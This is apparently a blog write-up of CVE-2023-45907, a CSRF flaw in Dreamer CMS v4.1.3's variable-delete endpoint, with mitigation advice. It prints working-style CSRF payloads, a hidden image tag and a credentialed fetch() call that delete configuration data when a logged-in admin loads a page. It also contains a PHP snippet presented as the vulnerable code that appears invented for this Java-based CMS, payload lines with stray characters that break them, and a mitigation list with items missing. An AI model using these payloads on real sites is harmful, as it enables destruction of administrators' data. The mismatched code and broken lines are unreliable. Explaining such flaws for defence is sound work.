In late 2023, security researchers uncovered a Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS v4.1.3. This flaw, registered as CVE-2023-45907, lets attackers trick logged-in admins into triggering unwanted actions, like deleting important variables, just by visiting a malicious website or clicking a crafted link.
In this post, I’ll break down how this vulnerability works, provide an example exploit, and give you tips on protecting your Dreamer CMS installation.
What is CSRF?
CSRF is a common web security bug. The attacker makes a logged-in user’s browser send an unwanted request to the web application (such as changing settings or deleting data). Since the request comes from a browser where the user is already authenticated, the site trusts it. CSRF attacks often succeed if the application does not require additional verification (like a CSRF token) for dangerous actions.
Where is the Problem in Dreamer CMS v4.1.3?
The main issue lies in the /admin/variable/delete endpoint. This endpoint is used in the admin panel to delete variables (configuration data). Unfortunately, it doesn’t require any request token or additional check—just being logged in as admin is enough.
Here’s a simplified version of the vulnerable PHP code (from original sources and bug reports)
// Inside controller or route handler
if ($_GET['action'] == 'delete' && isset($_GET['id'])) {
$id = intval($_GET['id']);
// No CSRF token or method check
delete_variable($id);
header("Location: /admin/variable/index");
}
No CSRF protection means any site can submit a GET request to this endpoint.
How Can This Be Exploited?
If an administrator is logged in to their Dreamer CMS admin panel, an attacker can send them a malicious link or embed an invisible request in a web page. When the admin clicks or even just loads the page, their browser will send the delete request as if it was part of the normal admin actions.
Example Exploit (HTML)
<!-- Send variable delete request when admin visits malicious page -->
<img src="http://your-dreamercms-site.com/admin/variable/delete?id=1"; style="display:none;" />
What does this do?
When an admin (already logged in) loads this HTML, their browser sends a GET request to /admin/variable/delete?id=1, deleting the variable with ID=1—no warning, no confirmation.
Another variant using JavaScript
<script>
fetch('http://your-dreamercms-site.com/admin/variable/delete?id=1';, {credentials: "include"});
</script>
This works as long as the target site uses cookies for authentication (which is common).
References & Security Advisory
- NVD entry for CVE-2023-45907
- Exploit details at Packet Storm
- Original researcher advisory
- Official Dreamer CMS site
What’s the Impact?
Attackers can delete any variable (site config data) from Dreamer CMS by choosing the right ID. In worst-case scenarios, this could break site functions, remove keys or credentials, or otherwise disrupt site operations.
How to Mitigate
1. Add CSRF Tokens: Developers should add anti-CSRF tokens and check them on dangerous actions in the admin area.
Update ASAP: Upgrade if Dreamer CMS releases a patched version.
4. Restrict Admin Panel Access: Ensure only trusted networks or VPN can access /admin endpoints.
Temporary patch example (PHP)
// Before allowing deletion
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
die('Method Not Allowed');
}
// Add CSRF token verification here
Conclusion
CVE-2023-45907 demonstrates how easy it is for attackers to exploit missing CSRF protection. If your website runs Dreamer CMS v4.1.3, protect it right now by updating or patching. Always assume that anything an admin can do could be abused by others unless you implement strong protections against CSRF.
Stay secure!
*This write-up is based on public reports and independent analysis. For more details, follow the references given above.*
Timeline
Published on: 10/17/2023 14:15:10 UTC
Last modified on: 10/18/2023 17:56:13 UTC